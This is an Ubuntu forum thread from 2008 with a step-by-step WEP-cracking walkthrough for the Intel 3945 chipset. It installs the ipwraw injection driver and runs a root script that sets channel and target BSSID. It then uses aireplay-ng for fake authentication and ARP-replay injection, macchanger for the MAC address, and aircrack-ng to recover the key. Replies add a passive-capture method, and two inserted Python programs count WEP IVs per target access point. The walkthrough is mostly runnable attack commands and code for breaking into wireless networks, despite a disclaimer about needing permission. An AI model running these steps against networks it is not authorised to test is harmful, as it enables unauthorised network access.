
Thread: WEP cracking under Hardy Heron, using ipwraw driver

  1. #1
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron
    WEP Cracking under Hardy Heron using the ipwraw driver
    FIRST READ THIS:

    Quoting XAsmodeanX:
    There is nothing inherently wrong with penetration testing your own networks, and it is not illegal to possess or use any of the tools in my tutorial.
    Following the logic that some Linux applications can be misused, and that they are made for Linux, then Linux itself can be misused. Of course, even though Linux can be a powerful tool or a "weapon" in the hands of some, all Linux discussion should not be removed simply because of the possibility of misuse.
    Providing people with the tools and knowledge to understand their own networks is a crucial step on the road to better security. If you don't understand a problem, you can't give a solution. The more that people know and understand how the WEP encryption scheme is broken, the better they can protect themselves by using WPA or another standard that is more secure.
    DISCLAIMER:
    Citing another one, which I cannot remember:
    Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
    NOTICE:

    Your computer may become unstable and even hard-lock [this seems to be related to injection speed; it is more prone to crash at 54M than at 1M] (you will need to do a hard reset of your machine; I can tell you this from my own experience while trying to do this). I recommend taking enough measures to safeguard your data in case you have to reinstall your OS, and PLEASE DO NOT TRY THIS ON PRODUCTION MACHINES.

    Please note that I'm using ipwraw, which is now deprecated, since I was not able to find enough information on how to do packet injection with the new drivers.

    A not so long trip... - Starting:

    I am aware that there are many ways to accomplish WEP cracking once you can perform injection, such as kismet and others, but this is the way that has worked for me since Gutsy Gibbon, and now I have managed to make it work on Hardy Heron.

    One main issue since the shipping of the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) was making it work with Linux at all. One effort (now deprecated) was the project hosted at http://ipw3945.sourceforge.net/, which offered a driver that, in order to be used, needed a binary microcode, a binary user-space regulatory daemon, the ieee80211 subsystem, a Linux kernel >= 2.6.13, wireless extensions and tools, and a WPA supplicant module [this will not be covered in this walkthrough].

    Now that effort has been deprecated in favour of the iwlwifi drivers (you can read the history here: http://intellinuxwireless.org/?p=iwlwifi). As far as I am aware, they support the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) out of the box.

    But...

    There is always a but. When it came to supporting packet injection, the problems arose. Some distros (wifiway, if my memory is not so bad) and some websites (seguridadwireless.com, if my memory is not that bad) showed us how to patch the drivers, and those steps have been ported to almost any Linux distro. With the binary drivers (ipw3945), and using the ipwraw driver hosted at http://homepages.tu-darmstadt.de/~p_larbig/wlan/, you were able to perform packet injection.

    Well, if you used those drivers, [almost] everything was OK. When I installed Ubuntu Hardy Heron, I was so happy that ipw3945 was gone and that the iwlwifi driver was in command now, until... I tried to test packet injection. Nothing worked. For almost a day or two (I cannot recall the total time...) I googled the WWW in order to find a possible solution. No luck, I just found nothing/nada [Had I entered the correct Google search terms? Perhaps]. I did stumble on some useful pages, indeed. Some of them uncovered that puzzle a little, and finally I was enlightened... [just joking about the enlightenment part]. This is a non-standard way... as you will see...

    The issue covered in this walkthrough is making the Intel 3945 chipset do packet injection under Hardy Heron, using the ipwraw driver provided by p_larbig. I'm working on various assumptions:

    • you have managed to patch the ipw3945 drivers previously
    • you own a Linux machine with Hardy Heron freshly installed; I have neither the time nor the will to test on an upgraded system
    • you have managed to compile/install previous versions of the ipwraw driver
    • you know how to use aircrack-ng
    • you own a WEP (Weak Encryption Protocol) network
    • you can use the CLI (ahhhhhhhh, Linux, your CLI, a powerful tool and a headache)
    • the CAPITAL LETTERS in the WEP key cracking part act as placeholders for
      • CHANNEL, the channel which will be sniffed/injected
      • FILE, a file name
      • ESSID, the access point name, such as WEIRDNET, INFINITAS, DREAMRYCHE
      • BSSID, the access point address
      • MACADDRESS, your wifi MAC address
    • you are using it at your own risk
    • you know what the hell you are doing


    A not so long trip... - Hands on:
    You will need to type (or copy-paste into the CLI) the following
    Installing part:
    Code:
    # build dependencies for the out-of-tree driver, plus macchanger for the MAC steps below
    sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger
    wget http://homepages.tu-darmstadt.de/~p_...022008.tar.bz2
    tar -xjf ipwraw-ng*
    cd ipwraw-ng
    make
    sudo make install
    sudo make install_ucode
    # keep ipwraw from loading at boot; it is loaded by hand below, in place of iwl3945
    echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
    sudo depmod -ae
    The non-standard way:
    open gedit, copy and paste the following
    Code:
    #!/bin/bash
    # Sets the ipwraw sysfs attributes for wifi0. Must run as root (see "sudo su" below).

    clear
    echo "Please provide the wifi0 CHANNEL"
    read canal
    echo "Please provide the capture rate (best results with only 2)"
    read rate
    echo "Please provide the target BSSID"
    read bssid
    ifconfig wifi0 down
    # make the rate attribute writable before writing to it
    chmod u+wrx /sys/class/net/wifi0/device/rate
    echo "$rate" >/sys/class/net/wifi0/device/rate
    echo "$canal" >/sys/class/net/wifi0/device/channel
    echo "$bssid" >/sys/class/net/wifi0/device/bssid
    ifconfig wifi0 up
    echo "Configuration completed. Ready to do packet injection"
    Save it under a sensible name such as wepcrackconf.sh and give it run permission by issuing
    Code:
    sudo chmod +x wepcrackconf.sh
    Unloading/loading drivers:
    Code:
    sudo modprobe -r iwl3945
    sudo modprobe ipwraw
    Cracking part:
    open four terminals
    first terminal
    Code:
    sudo iwconfig wifi0 rate 1M   # lower rate: fewer hard-locks (see the NOTICE above)
    sudo airodump-ng wifi0        # survey: find the target's BSSID and CHANNEL
    second terminal
    Code:
    sudo su
    ./wepcrackconf.sh
    • channel: pick the channel you wish
    • rate: always 2
    • bssid: taken from the previous terminal

    Code:
    exit
    # lock onto the AP's channel; the capture is written to FILE-01.cap
    sudo airodump-ng -c CHANNEL -w FILE wifi0
    third terminal
    Code:
    sudo macchanger -s wifi0   # shows the current MAC, i.e. MACADDRESS below
    # fake authentication every 10 seconds so the AP accepts our injected frames
    sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MACADDRESS wifi0
    fourth terminal
    Code:
    # ARP request replay: re-injects captured ARPs so the AP generates new IVs
    sudo aireplay-ng -3 -b BSSID -h MACADDRESS wifi0
    back on the first terminal
    After you have gathered enough IVs, stop the running command with Ctrl-C and issue
    Code:
    # airodump-ng -w FILE names the capture FILE-01.cap
    sudo aircrack-ng FILE-01.cap
    Unloading/loading drivers:
    Code:
    sudo modprobe -r ipwraw
    sudo modprobe iwl3945
    A not so long trip... - Comments:
    • the shell is now dash, not bash; the compiling part will complain about it, but it seems to compile the ipwraw driver fine
    • sudo make install, in the installing part, seems to be aware of the firmware status (patched?/not patched?)
    • sudo make install_ucode, same as above
    • In the non-standard way make sure that the quotes are CLI quotes (straight quotes), not typographical ones
    • In the non-standard way I'm using root powers to accomplish it. If you know another way to set the values, please let me know.
    • On the cracking part, fourth terminal
      • you will probably get a message stating something like "20:45:20 wifi0 is on channel 13, but the AP uses channel 6"; just reissue it
      • gather at least 500,000 packets to crack a WEP 64-bit hex key (This is no longer the case since the new PTW attack (which is built into aircrack-ng, and used by your instructions). These days, anything between 20,000 and 50,000 packets will succeed in cracking 128-bit WEP!) <- Thanks Noahod

    • you can change the MAC address; just read the macchanger info or man page

    A not so long trip... - Troubleshooting:
    • echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw seems not to be blacklisting the ipwraw module: just check that the quotes are CLI quotes, NOT typographical quotes, and issue the command again
    • If you cannot connect (after issuing all the commands or after a hard reset), just disable the ipw drivers and restart

    A not so long trip... - ACKs and references:
    In no particular order
    A not so long trip... - Misc:
    English is not my mother tongue, please be gentle with some grammatical errors. PM me and I will correct them ASAP.
    Based loosely on the XAsmodeanX tutorial (http://ubuntuforums.org/showthread.php?t=514723)
    A not so long trip... - Updates
    • There is a tool called wesside-ng, which is in beta in the aircrack-ng suite. It performs all the operations required to crack a WEP key, but IMHO it is quite unstable. It gave me 2 hard-locks in a row.
    • If you fail to reduce the capture rate the computer may crash... hard-learned by myself
    Last edited by qsr.nrwn; August 27th, 2008 at 04:52 PM. Reason: fixed some typos, updates and comments about speed, grammar corrections, updated download link
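    An added example (not the author's wepcrackconf.sh, and not part of the ipwraw project): the same three sysfs writes the script above performs, but with the channel, rate and BSSID validated before a root process echoes them into the driver, and read back afterwards so a value the driver did not accept shows up before airodump-ng and aireplay-ng are started (the "wifi0 is on channel 13, but the AP uses channel 6" situation from the comments). It assumes the attribute file names the post uses (rate, channel, bssid under /sys/class/net/wifi0/device); the channel range 1-14 and the "positive integer" rate check are my assumptions, not anything the driver documents here; the ifconfig down/up steps are left to the post's own script; and make_fake_sysfs() exists only so the code can be dry-run in a temp dir without root.

```python
"""Validated version of the wifi0 sysfs configuration step (added example, not the post's script)."""
import os
import re
import sys
import tempfile

# Attribute files the post writes under /sys/class/net/wifi0/device/
SYSFS_DEV = "/sys/class/net/wifi0/device"
ATTRS = ("rate", "channel", "bssid")
BSSID_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def normalize_bssid(value):
    """Lower-case and check a colon-separated MAC; None if malformed."""
    v = str(value).strip().lower()
    return v if BSSID_RE.match(v) else None


def validate(channel, rate, bssid):
    """Return a list of problems; an empty list means the values are safe to write.
    Assumptions: 2.4 GHz channels 1-14 only; rate is any positive integer."""
    problems = []
    if not (str(channel).isdigit() and 1 <= int(channel) <= 14):
        problems.append("channel must be 1-14, got %r" % (channel,))
    if not (str(rate).isdigit() and int(rate) > 0):
        problems.append("rate must be a positive integer, got %r" % (rate,))
    if normalize_bssid(bssid) is None:
        problems.append("bssid must look like 00:11:22:33:44:55, got %r" % (bssid,))
    return problems


def apply_config(channel, rate, bssid, sysfs_dir=SYSFS_DEV):
    """Write rate/channel/bssid, then read each back.
    Returns {attr: (wanted, got)} for every attribute that did not stick.
    Writing under /sys needs root, exactly like the post's script."""
    problems = validate(channel, rate, bssid)
    if problems:
        raise ValueError("; ".join(problems))
    wanted = {"rate": str(int(rate)), "channel": str(int(channel)),
              "bssid": normalize_bssid(bssid)}
    for name in ATTRS:
        path = os.path.join(sysfs_dir, name)
        if name == "rate":
            os.chmod(path, 0o600)          # the post does chmod u+wrx on rate first
        with open(path, "w") as f:
            f.write(wanted[name] + "\n")
    mismatches = {}
    for name in ATTRS:
        with open(os.path.join(sysfs_dir, name)) as f:
            got = f.read().strip().lower()
        if got != wanted[name]:
            mismatches[name] = (wanted[name], got)
    return mismatches


def make_fake_sysfs():
    """Temp dir with empty rate/channel/bssid files, for dry runs without root."""
    d = tempfile.mkdtemp(prefix="fake-wifi0-")
    for name in ATTRS:
        open(os.path.join(d, name), "w").close()
    return d


if __name__ == "__main__":
    # usage: sudo python3 wepconf.py CHANNEL RATE BSSID [sysfs_dir]
    args = sys.argv[1:]
    if len(args) < 3:
        sys.exit("usage: CHANNEL RATE BSSID [sysfs_dir]")
    target = args[3] if len(args) > 3 else SYSFS_DEV
    bad = apply_config(args[0], args[1], args[2], target)
    if bad:
        for attr, (want, got) in bad.items():
            print("%s: wrote %s, driver reports %s" % (attr, want, got))
        sys.exit(1)
    print("wifi0 configured; now start airodump-ng / aireplay-ng")
```

    Run it against the fake directory first (pass the path make_fake_sysfs() returns as the fourth argument) to see the validation errors for a bad channel or a malformed BSSID; on the real box it replaces only the three echo lines, so keep the ifconfig wifi0 down / up around it as in the post.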

  2. #2
    Join Date
    Mar 2007
    Beans
    Hidden!

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Excellent post. I kind of figured it out myself recently, but this is much of what I did. Hope this works for everyone.

  3. #3
    Join Date
    Jan 2008
    Location
    Mexico DF
    Beans
    3
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    You're a master, I got the ipwraw drivers back thanks to you, an excellent quick and easy solution.

  4. #4
    Join Date
    May 2008
    Beans
    2

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Hi!
    It was great to find someone having the same problem as me, who decided to solve it.
    I would also like to ask if you know whether this should work with the airoway script.

  5. #5
    Join Date
    Dec 2005
    Beans
    136

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Thanks for the info. I have one of the new Intel wireless N cards, and this helped me use aircrack. However, my process was much simpler, as the default driver in 8.04 supports monitor mode. Here's what I did, effectively:

    Code:
    sudo apt-get install aircrack-ng
    sudo killall NetworkManager        # causes issues if you leave it running
    sudo iwconfig wlan0 mode Monitor   # the stock driver in 8.04 supports monitor mode
    sudo airodump-ng -w dumpfile wlan0 # hops channels; writes dumpfile-01.cap
    In a second terminal:

    Code:
    sudo aircrack-ng dumpfile-01.cap   # re-reads the growing capture and retries as IVs arrive
    You can leave both programs running simultaneously, and aircrack will keep trying again and again as you gather more IVs until it cracks the key. This method means you just set it up and wait for the packets to fly.

    Again, thanks for the tips, I couldn't have figured this out without this post. I figured my experience was worth sharing.

  6. #6
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Quote Originally Posted by DarioA View Post
    Hi!
    I also would like to ask you if you know that this should works with airoway script.
    To which airoway script (there are several lurking on the internet) are you referring? Please post a link to the page [first guess: wifiway? http://foro.seguridadwireless.net/in...c,4093.0.html] that hosts that script and let me try it, so I can give you further advice about its drawbacks [if any] and about the configuration.
    Entia non sunt multiplicanda praeter necessitatem
    Ockham's Razor
    v4sw6+9BCSUhw4+6ln5/6pr6Fck45ma7u7+9Lw2DVWXm0l6+9DLUViOscitee8$t3b9ADM ORSTen7+9a28s8Mr2g0 hackerkey.com

  7. #7
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Quote Originally Posted by cracker View Post
    You can leave both programs running simultaneously, and aircrack will keep trying again and again as you gather more IVs until it cracks the key. This method means you just set it up and wait for the packets to fly.
    Leaving the card in monitor mode, as in your method, is useful only when you want to passively record all the packets, but gathering all the needed packets can be a loooooooong process unless you are planning to use the aircrack-ptw and wesside-ng approach, and as is stated in http://wiki-files.aircrack-ng.org/do...fin.slides.pdf, 21st slide, the numbers are as high as 100,000 to crack a 64-bit hex key.

    I tried your suggestion, and it collected about ~50 data packets in 16 minutes. With injection, you can collect about 500,000 in the same time. The whole point of injecting traffic into the network is to speed up the process, so this is the reason the ipwraw driver is needed: to send raw packets, as is described in http://www.security-freak.net/packet...injection.html
    Entia non sunt multiplicanda praeter necessitatem
    Ockham's Razor
    v4sw6+9BCSUhw4+6ln5/6pr6Fck45ma7u7+9Lw2DVWXm0l6+9DLUViOscitee8$t3b9ADM ORSTen7+9a28s8Mr2g0 hackerkey.com

  8. #8
    Join Date
    Dec 2005
    Beans
    136

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    I see what you mean. However, it doesn't really take that long if there's a client on the network. I cracked my own key with only 20,000 IVs, and with only one client on the network, surfing the web, it took less than fifteen minutes. Though, I can see how generating your own traffic would speed up the process, especially if there aren't any clients using the network.
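    The IV counting that post #1 ("after you have gathered enough IVs"), #7 and #8 argue about, as an added example that is not part of the thread or of the aircrack-ng suite: a small reader for the FILE-01.cap that airodump-ng writes (pcap link type 105, plain 802.11 frames without a radiotap header) that pulls the 24-bit IV out of every WEP-protected data frame and tallies, per BSSID, total frames, distinct IVs and repeated IVs. The 20,000 / 50,000 / 500,000 figures are just the rules of thumb quoted in the thread, not measurements; the capture returned by build_sample_capture() is constructed by me for the demo (one AP with a client, an unrelated AP, and some beacon / WPA / plaintext noise that must be skipped); it uses only the standard library.

```python
"""Tally distinct WEP IVs per BSSID from an airodump-ng capture (added example, not aircrack-ng code)."""
import struct
import sys
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4
DLT_IEEE802_11 = 105          # airodump-ng writes bare 802.11 frames, no radiotap header
# Rules of thumb quoted in the thread, not measured here.
PTW_LOW, PTW_HIGH, OLD_ATTACK = 20_000, 50_000, 500_000


def iter_pcap_packets(data):
    """Yield each packet's bytes from a classic little-endian pcap byte string."""
    magic, _vmaj, _vmin, _tz, _sig, _snap, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian pcap (magic %#x)" % magic)
    if linktype != DLT_IEEE802_11:
        raise ValueError("expected link type 105 (IEEE 802.11), got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl, _orig = struct.unpack_from("<IIII", data, off)
        off += 16
        yield data[off:off + incl]
        off += incl


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def extract_wep_iv(frame):
    """(bssid, iv, key_index) for a WEP data frame; None for anything else.

    Skipped: management/control frames, unprotected data, 4-address WDS frames,
    and TKIP/CCMP frames (Extended IV bit set in the 4th byte after the header).
    """
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, from_ds = fc1 & 0x01, (fc1 >> 1) & 0x01
    if ftype != 2 or not (fc1 & 0x40) or (to_ds and from_ds):
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = addr2 if from_ds else (addr1 if to_ds else addr3)
    hdr = 26 if subtype & 0x08 else 24      # QoS data carries a 2-byte QoS Control field
    if len(frame) < hdr + 4:
        return None
    iv0, iv1, iv2, kid = frame[hdr:hdr + 4]
    if kid & 0x20:                           # Extended IV => WPA, not WEP
        return None
    return mac_str(bssid), (iv0 << 16) | (iv1 << 8) | iv2, kid >> 6


def count_ivs(pcap_bytes):
    """Per-BSSID tally of WEP frames, distinct IVs and IV repeats (airodump's #Data column hides the repeats)."""
    seen = defaultdict(set)
    stats = defaultdict(lambda: {"frames": 0, "unique": 0, "repeats": 0})
    for frame in iter_pcap_packets(pcap_bytes):
        hit = extract_wep_iv(frame)
        if hit is None:
            continue
        bssid, iv, _ = hit
        stats[bssid]["frames"] += 1
        if iv in seen[bssid]:
            stats[bssid]["repeats"] += 1
        else:
            seen[bssid].add(iv)
            stats[bssid]["unique"] += 1
    return dict(stats)


def ptw_status(unique):
    """Map a distinct-IV count onto the thread's rule of thumb."""
    if unique >= PTW_HIGH:
        return "likely enough for PTW"
    if unique >= PTW_LOW:
        return "worth trying aircrack-ng (PTW)"
    return "keep injecting: %d more to reach %d" % (PTW_LOW - unique, PTW_LOW)


def _frame(fc0, fc1, a1, a2, a3, iv=None, key_id=0, qos=False, ext_iv=False):
    """Constructed 802.11 frame: 24-byte header, optional QoS field, optional (Ext)IV header, dummy body."""
    hdr = bytes([fc0, fc1, 0, 0]) + a1 + a2 + a3 + b"\x10\x00" + (b"\x00\x00" if qos else b"")
    crypt = b"" if iv is None else iv.to_bytes(3, "big") + bytes([(key_id << 6) | (0x20 if ext_iv else 0)])
    return hdr + crypt + b"\xaa" * 20        # opaque ciphertext + ICV placeholder


def build_sample_capture():
    """CONSTRUCTED capture: one AP with a client, one unrelated AP, some non-WEP noise."""
    ap, cli, other = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), bytes.fromhex("ccddeeff0011")
    bcast, WEP = b"\xff" * 6, 0x40
    frames = [
        _frame(0x80, 0x00, bcast, ap, ap),                                  # beacon, skipped
        _frame(0x08, 0x02 | WEP, cli, ap, cli, iv=0x010203),                # AP -> client
        _frame(0x08, 0x02 | WEP, cli, ap, cli, iv=0x010204),
        _frame(0x08, 0x01 | WEP, ap, cli, ap, iv=0x010203),                 # client -> AP, IV reused
        _frame(0x88, 0x02 | WEP, cli, ap, cli, iv=0x010205, qos=True),      # QoS data frame
        _frame(0x08, 0x02 | WEP, cli, ap, cli, iv=0x010206, ext_iv=True),   # WPA frame, skipped
        _frame(0x08, 0x02, cli, ap, cli),                                   # plaintext, skipped
        _frame(0x08, 0x02 | WEP, bcast, other, other, iv=0x0a0b0c),         # other BSSID
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    # usage: python3 ivcount.py FILE-01.cap   (no argument: run on the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_capture()
    for bssid, s in sorted(count_ivs(data).items()):
        print("%s  frames=%d  unique IVs=%d  repeats=%d  -> %s"
              % (bssid, s["frames"], s["unique"], s["repeats"], ptw_status(s["unique"])))
```

    Point it at the FILE-01.cap from the second terminal while airodump-ng is still writing it: the "unique" column is what the PTW attack actually needs, which is why a passively captured busy client (post #8) and an ARP replay loop (post #7) are both counted the same way, and why a capture full of retransmitted frames can show a big #Data figure and still come up short.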

  9. #9
    Join Date
    May 2008
    Beans
    30

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Hi,
    I'm rather new to this, so forgive me the newbie question.

    I have been playing around with aircrack with no success, only to realise that my driver is the ipw3945. The ipwraw is a great solution for use with this, as I understand aircrack does not support the 3945. I'm a bit slow, because it took me ages to realise this.

    I have done everything down to the crack part.

    I have a question about the placeholders. Where do I get the information for the channel and the MAC address (correct me if I'm wrong, but is that through the iwconfig command?), and as regards the file name, can this be of my choice? And does the file get saved, and if so is there a good directory it can go in, or does it go in the /ipwraw directory?

    Thanks.

  10. #10

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    First off, great post, good work on getting it done. The ipwraw driver has only one side effect: to get the best out of it you must set your network manager (i.e. manual network configuration) to manual config and set it to roaming mode.

    Once you do that, follow this post and you're skyling.

    Once again, good work.

    Cheers all
